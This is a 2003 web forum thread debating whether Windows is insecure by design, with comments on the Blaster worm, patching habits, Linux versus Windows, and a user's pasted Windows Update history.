Nope. Roomy sat there waiting for his chair to blast off, he could have been watching me pilot the starship Enterprise as far as he knew.

I very quickly drew the conclusion that this kid was not only dead in the head, his computer skills are less than ZERO.. I asked him what he has, he told me he has a laptop with Windows 98. Whee! How fun can that be??!!

There were hundreds of kids lugging brand new Compaq and Dell boxes in and they *ALL* had big fat, "WINDOWS XP installed" stickers on them.

You can bet your ass that those kids will be ate up with that shit, probably already, if not for sure by the coming weekend.

Those kids, by dragging all those XP boxes in were building a big petri dish for the script kiddies to play...

I can say this. I'm damn glad my kid is using Linux, I don't have to worry about him getting caught up in all these childish virus/worm/trojan games. This shit has gone way, way too far.

I'm not going to pump all my money into repairing his PC (600+ miles from home) every few days, dumping money down the toilet on anti-virus crapware that does not work, and paying $200 for an OS that just brings you constant headaches.

I told my son that if he wants to stay in that school then the Linux stays on his PC and M$ is forbidden on his machine. If he changes it or let's someone change it, that's it. He goes to local community college with the local idiot beerheads..

Re:Dorms the breeding grounds??

[andrewski]

God, you should give your kid some oregano and tell him to make his tuition by selling it as grass. Sounds like these kids aren't just dumb enough to smoke it, they're dumb enough to get really high in the process!

NO! Please don't mail update CDs

[DFossmeister]

I find the article's amusing suggestion that MS could send update CDs to everyone on the planet scary. Its bad enough that I get my monthly AOL CD. I don't want a quarterly MS CD either.

Did anyone else notice this, or was it just me?

Re:I have a coworker who kept saying it was hardwa

[dtfinch]

Some of us developers working for smaller businesses need to handle EVERYTHING.

"Hey, Dave, make our fundamentally different, colocated e-commerce sites securely share all their data amongst each other and seemlessly integrate it with this new proprietary MRP solution. Upgrade our computers when we're not using them. Find a legal way to install this one copy of Office onto all these computers. Make our computers faster and better. Don't touch my computer. Upgrade our Norton Antivirus server and all our clients. None of us want login passwords, but we do want security. This one mid-90's era server ought to be enough for all our needs. We want video conferencing on all our sites. We don't want to buy anything."

I do almost as much IT support as I do development.

The best feature of non-outlook email programs

[AsmordeanX]

The best feature of non-Outlook email programs is the inability or difficulty that they have running activex, java, or javascript.

To this date I have yet receive a single email that has ever needed to use any script or programming language to deliver the message so why the heck is it still in and ON by default?

Ah well, all I can do is my part. I patch and have a linux based firewall protecting me. That firewall has had nearly 3000 hits on 135,137, or 139 in the past two days. A month ago it would have had no more than 12 in the same period.

Coincidence?

[Spectrum_Leap]

Mac and Linux not targeted? Taking the view of a malicious hacker, why would you bother coding a virus that only affected a minority of computer users? If Linux ever really makes it mainstream, you may find it's just as susceptible.

Re:Coincidence?

[gregm]

Oh bullshit.... Imagine a virus that shutdown every linux box attached to the net. I'm talking routers firewalls, web and email servers, etc, etc. That would be a big deal and a big feather in the cap of a virus writer. Google would go down! oh just thinking about it scares me.

G

Cars to Computers analogy

[TWX]

Well, checking the oil I'd put more akin to checking free resources. Same for most of the other fluids in the car, short of fuel. fuel's akin to turning the thing on in the first place. Do these people need to know how to operate the turn signals, trunk release, windshield wipers, domelight, etc? I'd rate them as your basic intelligent car owner.

As for changing fluids out, the computer equivalent would be to a backyard mechanic, who handles oil and antifreeze coolant. Maybe checks the tranny fluid and takes it somehwere if it doesn't look right. Changes out burned out lights, etc. Stuff that is mostly covered in the owner's manual, or at least has stuff like fluid quantities. In computers, I'd equate that with being able to hook up external devices and get them to work, being able to remove stuff from C:\WINDOWS\START MENU\PROGRAMS\STARTUP, configure basic network settings from instructions for something like DSL or Cable. Calls for support or a technician when something out of this range goes wrong.

A+ certified techicians would equivalently handle basics, like replacing alternators, starters, draining transmission fluid, replacing water pumps, checking differential gear oil, lubing the suspension or steering parts, replacing obviously bad water hoses, and the like. Stuff that stands out. By comparison to computers the person would be able to replace hard disk drives and CD-ROMs, install video cards, install the OS from scratch for the default configuration, configure sound support, and the like. Maybe even dig into the registry a smidgeon.

And above that you'd have your power-technicians, who would be up there with not being afraid to remove stuff like engines, axles, transmissions, steering columns, dash boards, interior parts, etc. These people would be able to play with advanced networking, deal with driver and IRQ conflicts, handle tweaking of the OS, dig into the registry a bit, etc.

Beyond that, you find different people who can rebuild engines or transmissions in their sleep, modify sheet metal artistically, handle advanced upgrading of suspension, and the like. They would in computer equivalents be specialized, but very talented. They probably wouldn't even do much of the lower-level work unless they had to, because they would be more valuable higher.

Well, that was quite long enough of a ramble...

Re:Cars to Computers analogy

[Anonymous+Shepard]

"A+ certified techicians would equivalently handle basics, like replacing alternators, starters, draining transmission fluid, replacing water pumps, checking differential gear oil, lubing the suspension or steering parts, replacing obviously bad water hoses, and the like. Stuff that stands out. By comparison to computers the person would be able to replace hard disk drives and CD-ROMs, install video cards, install the OS from scratch for the default configuration, configure sound support, and the like. Maybe even dig into the registry a smidgeon."

I think it is rather silly to talk about a "technician" of any degree in a case like this. I have changed and installed harddrives, CD-ROM drives and various cards inside the box. I have installed my OS (Windows several times, Mandrake Linux twice), formatted and partitioned harddrives, and even occasionally been "dig[ging] into the registry a smidgeon".

But I wouldn't consider myself a "technician", even in a metaphorical sense; I have an education in the humanities. I am miles and miles away from doing any serious computer-related work, such as programming.

The reason I can do these things is because the OS installation interface today is extremely simple (for the needs of the normal computer user), and the preconfigured way the OS and various programs work is still annoying enough (I'm talking about Windows here) that I feel I have no choice but tweaking a bit. And the hardware interface is also rather obvious; in most cases one really has to go out of one's way to connect anything wrongly inside the box, or mess up anything seriously if doing so. I am able to use the software and hardware resources I have to use, and I cannot afford having anyone else to help me with them. That's all. I enjoy doing this, to a certain degree.

Was Windows designed as a network OS?

[megazoid81]

Is it possible that Windows was never designed with security from the start because it was not designed for a network from the start? MS entered the networking and Internet game pretty late and with it came all the worms, trojans and other stuff. Of course, this assumes that the constituents of present-day Windows have a lot in common with the pre-TCP/IP Windows of old. Still, I think it could be one way of looking at the fundamentally insecure design of Windows.

Complete with ad for "Windows 2003 Server."

[spoot]

I thought it was amusing when I surfed over to the Post to read the article there was an ad for "Windows 2003 Server" on the page. I had to take a screen shot. If you want it it's here --> http://johnford.net/images/windows_ad01.jpg

Windows does not have to be insecure.

[facelessnumber]

...Or, "The Tecn Commandments of Windows Security."

I run Linux on my servers, but for compatibility, certain programs I need, etc., etc., my workstations use XP. I haven't patched anything. I don't trust the patches and especially not the Service Packs. They can break things and slow things down. If my box is working, why tempt fate? There are a few, very simple things to do that will keep Windows almost entirely secure:

1 - No scripting host. If you don't need it, kill it.

2 - No Outlook. Outlook is bad. IE is almost as bad. Everyone should know this by now. And if you must use it...

3 - Don't open file attachments from anybody unless you know what the hell they are! Why is this so difficult? Well, it's because people never...

4 - Unhide the file extensions. You wouldn't eat something from a package simply labled "food" without having some clue what's in it, so why double-click an icon without knowing what it will do? Learn what these extensions are, and Google it if you're not sure what a given one means.

5 - Don't use IE if you don't have to. Mozilla's now advanced and stable enough that you should almost never have to use IE to properly view a site. I never have a problem with popups, and I've never had my browser hijacked. Using IE tempts people to break #6...

6 - Read the question before you answer "Yes." Do you walk around at work slackjawed and answering "yes" to every question you're asked without listening? If you weren't specifically looking for what a site wants you to install, chances are you don't need it.

7 - Firewall. Buy a $30 broadband router, build a Linux gateway, enable XP's own, built-in, pre-installed firewall, or get something like Zone Alarm, depending on your needs and/or level of computer literacy.

8 - Don't download software without knowing exactly what it is. Read the license agreement. Sure, I like to check out neat toys on Download.com too, but not if I have to install Gator or GAIN to use them. See #6. Read!

9 - Check your processes. and read what's going on in there. Google each one. This is a pain in the ass the first time, but do it once and then you'll know when something's not supposed to be there.

10 - Watch who gets your email address. Get two. One for ordering/registering things, and one that you only give to real people.

That's it. I run no antivirus software and my system thanks me for it with good performance. I have not loaded a Service Pack, a patch, anything. None of this is difficult. These rules are simple enough for almost anyone to follow, and the major ones are extremely easy.

MS Marketing department security bulletin ratings

[lanalyst]

This is what grabs me: a new vunerability with MDAC announced on 8/20 is rated as 'Important'. Same buffer overflow problem as 026.. same potential for damage.. most/all corporate customers have MDAC running.. but it doesn't rate a 'Critical'. Are they waiting for exploit code to appear or are they waiting for the sh!tstorm to die down?

Another one for the compost pile

[davmoo]

While Microsoft certainly has its problems, this attitude is pretty much, in my opinion, bullshit. If the statistics were reversed and Apple or Linux had 95% of the market you'd see just as much trashing on those systems as you see now on Windows. Script kiddies are going to attack what ever gets them the most attention. And attacking something that only has 3% of the market does not get them that attention.

Its the same philosophy of why more Corvettes get stolen than Yugos. Nobody wants a Yugo.

Yes, Windows has internal problems. All OSes do. Its a fact of life.

Re:Another one for the compost pile

[burns210]

nope. i call BS.

If Apple has a worm sent around by email(or whatever) you know what would happen... you would get it (after the user who sent it to you click the OK box before the worm auto sended to your mail list), it would ask you to open the porgram and if you want to execute the code, if you choose yes, then it would do whatever damage it could do... that is after you clicked OK and let it do it.

Just because MS is a bigger target, doesn't mean they don't shoot themselves in the foot. Running arbitrary code automaticly without a prompt, along with sending bulk email without getting permission are BUGS, not features.

Re:Another one for the compost pile

[andrewski]

You are fooling yourself with specious reasoning. It's much tougher to make a virus for OS X or Linux than it is for Windows. It's because of this that we see more Windows viruses than any other reason. Any OS has design flaws, but none approach the retardedness of Windows.

Never Ascribe to Conspiracy....

[jefu]

The saying goes "Never ascribe to malice that which is adequately explained by stupidity."

And I think that goes for "conspiracy" too.

Though I do expect that MS will happily exploit their laxness in building their systems if they can do it in such a way as to make their monopoly permanent and legally required.

Umm...

[tomkit]

Umm...I didn't read people's posts, but what about the fact that Mac and Linux make up only a small percentage of the OS used today? Who would want to create worms with a target of ~5% of computer users?

Re:JRTFA

[caouchouc]

There are some unlucky people who practiced due dilligence and thought they were patched, but were not.

Windows Update had (and still has) a flaw in that it checks registry keys to determine if you have patches installed, rather than the files themselves. Sometimes the registry key is inserted but some or all of the actual patch files are not, for one reason or another. This happened to many people on July 17th, and they were probably really surprised when they got hit by the MS Blaster worm.

One particularly noteworthy victim of this flaw is the US army.

Re:I have a coworker who kept saying it was hardwa

[dtfinch]

How long ago was that?

There's Bochs, which is free and will emulate an x86 on almost anything, including the Mac, but it's not very fast.

And since about 1994, there have been Macs that can run Windows using a built-in x86 compatible processor, like having two computers in one. You could switch between them by pressing a simple key combination, and it came with software to help you do things like copy and paste between them. The high school I attended had one.

My bosses generally don't believe in "can't", but most of the time they're right.

MS About to Capitalize on Flaws

[Web+Goddess]

In the past week, the Merc has been running articles quoting Microsoft authorities as saying, essentially, "Honest Injun we WANTED to require automatic updates, but we thought people would be paranoid of our intentions, so we made updates optional! Now look at the chaos!"

My prediction: There WILL be an attempt by Microsoft, probably successful, to make sure all future Windows versions automatically check for and download updates -- not only bug fixes, but also updates for furthering their own inimical combinations of big brother and forced marketing.

- Wendy

This story is nice

[inkswamp]

So Windows is insecure by design, huh?

It's so nice to see Microsoft finally get something right.

Dissapointing ommission

[Baki]

What the article talks about is merely "insecure by configuration", not "by design".

OK, MSFT could and should improve in creating a more secure default configuration, but I expected the article to be more interesting regards the "design" of windows:

Graphics in the kernel, no true multi-user system and filesystem permissions. That, IMO, is what makes Windows insecure by design. And those are issues that won't be so easy to fix without large rewrites and without breaking a lot of backwards compatability. The configuration in contrast can be fixed quite easily. It is on a deeper level where the real trouble is.

users are dumb too

[CowBovNeal]

To see the magnitude of the problem, go to download.com and check the user opinions of the software listed there.

Lets say you go to see the user opinions of Mailwasher Pro or Disruptor OL.

These programs integrate with Outlook Express and are very easy to configure.

Now half the people who gave these programs negative reviews did so because they couldn't fsking understand what to do.

Who's fault is it then? When they can't understand easy programs like Mailwasher or Disruptor then how do you expect them to figure out stuff in Linux?

For these dumb heads, there is nothing you can do.

Its a known fact that the easier a firewall is to install and configure, the more insecure it is.

A good firewall should be one where you need to configure many of the options yourself.

Is somebody going to tell that to the users of Zone Alarm which pretty much needs no configuration?

Linux is more secure because a lot of stuff is configurable.

Re:users are dumb too

[jonadab]

> Linux is more secure because a lot of stuff is configurable.

There is truth here. Remember the /. article a while back about
how it's hard to find a stock build of Apache in the wild because
all the distros add stuff or make changes? There've been several
security advisories relevant to Apache in the last year, but though
I have Apache running on several systems I was impacted by exactly
zero of them, apart from having to read the security advisory to
determine whether I needed to be concerned.

Configuring options rather than being happy with defaults is not a
magic tonic to solve every problem, but it is a contributing factor
to security.

The prize quote:

[geschild]

Coming late to this discussion but I still have to say this even if nobody reads it...

The quote from this article in a highly visible magazine is:

The chance of a patch wrecking Windows is dwarfed by the odds that an unpatched PC will get hit. And for those saying they don't trust Microsoft to fix their systems, I have one question: If you don't trust this company, why did you give it your money?

(emphasis mine).

This is the one question. Why are there so many technical people that, knowing all the risks and odds, still don't dare patch the systems for fear that the cure will be worse than the dissease?

I know that the writer is mostly concerned with all the ignorant people at home, but when Microsoft itself tells people to not connect to the Internet because of security concerns, then logic fails. How should these people get their updates then?!

Enough ranting since chances of this being read are small anyway. No sense in wasting time.

"insecure by design" explained

[eddeye]

As someone who works in security, "insecure by design" has a precise meaning to me, which I've not seen mentioned here yet. The developer's intentions have nothing to do with it. "Insecure by design" means every implementation of a given system will share a common set of security vulnerabilities. In other words, the design (think API or protocol) itself is flawed. No implementation is safe.

Example: The design of the http protocol does not provide any method of running arbitrary code from the client on the server. A perfectly implemented web server will contain no remote vulnerabilities of this type. Flaws in particular web servers like IIS are caused by mistakes in the implementation, not the http protocol itself. The protocol is secure by design with regard to this attack.

Contrast this with a protocol whose design is insecure. Nothing in the SMTP spec addresses the issue of spam. High-volume anonymous message injection is allowed by the protocol. Solutions to spam have to be implemented externally with things like blacklists and filters (which are considered external even when run during the SMTP transaction as they aren't part of the SMTP protocol itself). No SMTP server, no matter how perfectly implemented, can both completely follow the SMTP spec and reject all spam. Thus SMTP is insecure by design with regard to spam.

Nebulous terms like "windows" and "secure" mean next to nothing by themselves. What is "windows"? The NT kernel? The win32 API? The set of programs and services enabled by a default install? Secure against what types of attacks?

For reasonable definitions of the above, the statement "Windows is insecure by design" certainly makes sense. Take "windows" to mean the win32 API and "secure" to mean enforcement of access control. Remember the shatter attacks discovered last year? That's a flaw in the design of the win32 API. No implementation is safe. It fits the definition of "insecure by design" perfectly. And Microsoft has alluded to more such vulnerabilities lurking in the win32 API (remember when they said they couldn't reveal all the APIs for security reasons?).

Re:JRTFA

[nicklott]

I'm runnning windows update now, and hey whaddya know.. 17Mb... that's gonna take a while on my 56k dialup. Hmmm... Maybe I won't run it after all..

Insecure by design?

[EddWo]

I'd like to know if this is really true.

When the NT kernel was being designed it had security in mind. There are varying levels of privelige, access control lists for the file system and system objects etc. Some of these features are only appearing in Linux now with 2.6

Sure there have been flaws in the implementation, services turned on, running with system level priveleges with ports exposed to the internet. So Windows the system is not secure out of the box. But is it insecure by design?

A lot of people run windows as an administrator because programs written in the 9x era were not designed with the security model in mind. Programs want to access system level files or registry settings. Windows XP brough the two product lines together but in order to maintain the backwards compatibility they had to sacrifice the security.

Also people hate hitting security barriers whenever they want to reconfigure something.

I would like to see some evidence that a box running NT can NEVER be secure due to its design, rather than just not being currently secure due to its implementation.

All the trolls about MSLinux seem to assume that NT is a terrible cludge that MS ought to abandon and just build a Windows GUI over Linux like Apple did over BSD.

Is NT really flawed in its design or is it just the layers of services, APIs and backwards compatibility fixes that make the current implementations of NT vulnerable.

If all Win32 apps were sandboxed the way win16 apps are and MS migrated to a new API would this solve a lot of the problems?

I would welcome links to articles about this.

Re:JRTFA

[jonadab]

> Tell your friends: Don't preview email. Delete email you don't
> know or trust. Don't open attachments if they're not absolutely
> known and expected Update early and often

No. Tell them go to www.pmail.com and get Pegasus Mail, and read
email with that. "Don't use Outlook. It's too dangerous."

Naive

[StormReaver]

"The chance of a patch wrecking Windows is dwarfed by the odds that an unpatched PC will get hit."

Yet my workplace has had several problems directly caused by Windows updates. It's not frequent, but it's happened far more often than it should. It would be different if the problems were intentional and documented (see Red Hat example below), but they weren't. We had to roll back the patches and intentionally leave ourselves vulnerable until the next patch that fixed the prior patch was released.

I have had only one Red Hat security fix that caused (minor) problems with one of the Linux systems (the web server). An Apache upgrade was made in which the configuration format for one option (I can't remember which one) was changed, making the current configuration non-functional. However, this was planned by the Apache Group and was documented in the upgrade RPM. A simple tweak to the configuration file brought the service back, and life went on.

"And for those saying they don't trust Microsoft to fix their systems, I have one question: If you don't trust this company, why did you give it your money?"

This is a bone-headed question. They gave Microsoft their money because they had to. Most people still don't know anything but Microsoft. They blindly hand over their money year after year because, thanks Microsoft's abuse of its monopoly position, they don't have a choice.

Re:Total Windows XP updates

Here's what was installed on my XP machine at work:
Successful Thursday, August 21, 2003 Security Update for Microsoft Data Access Components (823718) Web site
Successful Thursday, August 21, 2003 August 2003, Cumulative Patch for Internet Explorer 6 Service Pack 1 (822925) Web site
Successful Wednesday, July 30, 2003 Windows Error Reporting: Recommended Update (Windows XP) Web site
Successful Thursday, July 24, 2003 Q322011: Recommended Update
Read more... Web site
Successful Thursday, July 24, 2003 Recommended Update for Windows XP SP1 (817778) Web site
Successful Thursday, July 24, 2003 DirectX 9.0b End-User Runtime
Read more... Web site
Successful Thursday, July 24, 2003 Security Update for Microsoft Windows (819696) Web site
Successful Thursday, July 17, 2003 821557: Security Update (Windows XP) Web site
Successful Thursday, July 17, 2003 Security Update for Windows XP (823980) Web site
Successful Friday, July 11, 2003 817606: Security Update (Windows XP) Web site
Successful Friday, July 11, 2003 823559: Security Update for Microsoft Windows Web site
Successful Friday, June 27, 2003 Hp Printer Driver Version 4.20.4100.430 Web site
Successful Friday, June 27, 2003 Q282010: Recommended Update for Microsoft Jet 4.0 Service Pack 7 (SP7) - Windows XP Web site
Successful Thursday, June 26, 2003 327979: Recommended Update Web site
Successful Thursday, June 26, 2003 DirectX 9.0a End-User Runtime
Read more... Web site
Successful Tuesday, June 24, 2003 Microsoft .NET Framework version 1.1
Read more... Web site
Successful Tuesday, June 24, 2003 814995: Recommended Update Web site
Successful Tuesday, June 24, 2003 331953: Security Update (Windows XP) Web site
Successful Tuesday, June 24, 2003 329170: Security Update Web site
Successful Tuesday, June 24, 2003 811630: Critical Update (Windows XP)
Read more... Web site
Successful Tuesday, June 24, 2003 Q329048: Security Update
Read more... Web site
Successful Tuesday, June 24, 2003 Q323255: Security Update (Windows XP)
Read more... Web site
Successful Tuesday, June 24, 2003 Microsoft .NET Framework Service Pack 2, English Version
Read more... Web site
Successful Tuesday, June 24, 2003 814078: Security Update (Microsoft Jscript version 5.6, Windows 2000, Windows XP) Web site
Successful Tuesday, June 24, 2003 817787: Security Update Windows Media Player for XP Web site
Successful Tuesday, June 24, 2003 810577: Security Update Web site
Successful Tuesday, June 24, 2003 810833: Security Update (Windows XP) Web site
Successful Tuesday, June 24, 2003 810565: Critical Update Web site
Successful Tuesday, June 24, 2003 328310: Security Update Web site
Successful Tuesday, June 24, 2003 Q329115: Security Update (Windows XP) Web site
Successful Tuesday, June 24, 2003 Q329390: Security Update Web site
Successful Tuesday, June 24, 2003 Q329834: Security Update (Windows XP)
Read more... Web site
Successful Tuesday, June 24, 2003 814033: Critical Update Web site
Successful Tuesday, June 24, 2003 Q329441: Critical Update Web site
Successful Tuesday, June 24, 2003 Q815021 XP: Security Update Web site
Successful Tuesday, June 24, 2003 816093: Security Update Microsoft Virtual Machine (Microsoft VM) Web site
Successful Tuesday, June 24, 2003 Q817287: Critical Update (Catalog Database Corruption in Microsoft Windows XP) Web site
Successful Tuesday, June 24, 2003 811493: Security Update (Windows XP) Web site
Successful Tuesday, June 24, 2003 330994: April 2003, Security Update for Outlook Express 6 SP1 Web site
Successful Tuesday, June 24, 2003 818529: June 2003, Cumulative Patch for Internet Explorer 6 Service Pack 1 Web site
Canceled Monday, June 23, 2003 Microsoft .NET Framework version 1.1
Read more... Web site
Failed Monday, June 23, 2003 DirectX 9.0a End-User Runtime
Read more... Web site
Successful Thursday, November 01, 2001 Windows XP Update Package, October 25, 2001 Web site
S

Popularity or OS design

[Martok7]

Not that I am a Windows fan but if Mac or Linux was the most popular OS wouldn't most viruses and worms target these systems? Window's might have it's security problems but I see new updates and security patches on my RedHat boxes all the time. Couldn't these explots be used for viruses if virus creators targeted Linux or Mac?

Re:why don't you want flash installed...

[Technician]

It's simple. No end user control. Ever try to read the news on a Yahoo page that has all options missing except about macromedia flash?
The only way to turn off the noise was remove the player. Until they fix the problem of no user control, it won't run on my systems.

A simple always functioning stop and play buttons are all that are needed but are lacking in many in your face blinking wiggiling distracting ads. Even if ESC would work like animated GIF's stop, but even this is non-functional on FLASH. The stop button does nothing, right clicking to uncheck play does not work, only removal works 100% of the time. It's the same reason the blink tag was so hated.
Since I don't need to see all the trivial stuff to read the news, I just do without the player as it's the easiest way to kill the video noise.

RTFA

[mobileskimo]

You obviously didn't RTFA.

You
people create virii for windows because that's what people use, not because it's more insecure than other OS's. When linux gets more popular people will start making virii for it.

Rob Pegoraro
The usual theory has been that Windows gets all the attacks because almost everybody uses it. But millions of people do use Mac OS X and Linux, a sufficiently big market for plenty of legitimate software developers -- so why do the authors of viruses and worms rarely take aim at either system?
Even if that changed, Windows would still be an easier target. In its default setup, Windows XP on the Internet amounts to a car parked in a bad part of town, with the doors unlocked, the key in the ignition and a Post-It note on the dashboard saying, "Please don't steal this."

As to why this was posted on Slashdot? For the bashers. It's good to wake up in the morning and feel righteous. But seriously, it's a good summary for those that keep arguing this point, that is if people would bother to RTFA. It also puts a little more credibility into it than the average slashdot troll.

Windows' problem not insecure by design IMO

[theolein]

As an ex Windows admin, the thiing that I found most difficult about Windows was not a lack of security by design. Downloading the patches and keeping the AV up to date will suffice normally. No, the problem of windows, to me, lies in that it is a fucking mess.

This may sound ludicrous in view of the jungle that one faces when one moves through a *nix directory tree on the command line (e.g. why is there /bin, /usr/bin, /usr/local/bin etc, confusing for a newbie), but the fact that Windows has literally tens of dozens of directories that belong to the system, that are both undocumented and not self explanatory, as well as the registery, which is an inconsisten fucking mess if there ever was one are things that make windows a pain.

On top of this there are so many design decisions that are superficially a good idea, but make things hell when one goes beneath the hood. An example is the desktop. From a visual point of view it might make sense to only store data in my documents and below that, which is also encouraged by the open/save dialogue, but the My Documents sits in a deep sub folder in the real directory tree. The actual dialogue boxes of so many system controls are anything but friendly. While the wizards make things simple in a linear way, they are a stop gap measure screwed on top of a system that is anything but consistent and visually well though out otherwise.

To me it seems that MS designs it's system in that the core OS team has first go at making the bitch work, and after they are done, the mess is passed on to the UI team which then has the pleasure of slapping crap like wizards and My Documents and tons of irritating marketing reminders (passport, messanger bla bla bla, hide those icons so you can't find them again) on top of the system so that MS can call it "User friendly".

Fucking bullshit.

Re:Total Windows XP updates

[Brendan+Byrd]

Read the rest of this comment...

That, in and of itself, is funny.

Terrorists, vinerabilities, and liability?

[gone.fishing]

One of the things that I fear the most is an actual terrorist attack using viruses to completely disrupt our financial system. It could be pretty simple and still be successful simply because the countries that have the money are the same countries that the terrorists are targeting! While countries like Iran would be "hit" they would not suffer nearly the damage that countries like the U.S. and Great Britan would. Because of this possibility, I think it is very important that the free countries of the world take immediate steps to harden themselves against computer based terrorisim, worms, viruses, and other security issues.

I think that there is poor security designed into Windows. Microsoft knows how to design adequate security, as proof of that look at the X-box. It is quite secure. This probably means that a future generation operating system is going to take the "lessons learned" from the X-box and apply them to that new O/S. This will be the PR story at least. The truth will be closer to MS obtaining a software monopoly on the Windows platform. They will control licenses for it and will require your source code for evaluation before you get the key that will allow installation.

Perhaps poor security is better than the alternative that M$ will dream up. They are driven by profit (every company is) and will take full advantage of any opportunity that they control (as they have already demonstrated).

After the past couple of weeks, it is obvious that there is a business opportunity out there for someone OTHER THAN MICROSOFT to offer a product for Windows that is a full featured security system for desktops (and servers).

I'm wondering what this kind of system would entail? How could you provide exceptional security to everything from a home PC to an enterprise level network? There are some obvious things like firewalls, anti-virus protection, automated patches, controls for security and permissions, and so on. But there are other things that could be done too. How about a key system for executing software? If the key does not exist then the software (exe, process, driver whatever) simply does not get permission to run. What about software that monitors network traffic and when certain limits are set human intervention is required of the PC is taken off line?

I am also wodering about the ethical issues associated with all of this. If Ford puts a car on the road that they know is insecure and an accident happens, they have liability. If I drive a car knowing that it is unsafe, I have liability. If the state allows a road to go unrepaired, they have liability. Isn't the same thing true for a software product? In today's world, in this litigious society, isn't M$ opening themselves up to a great deal of liability when their software is a swiss cheese of vunerabilities?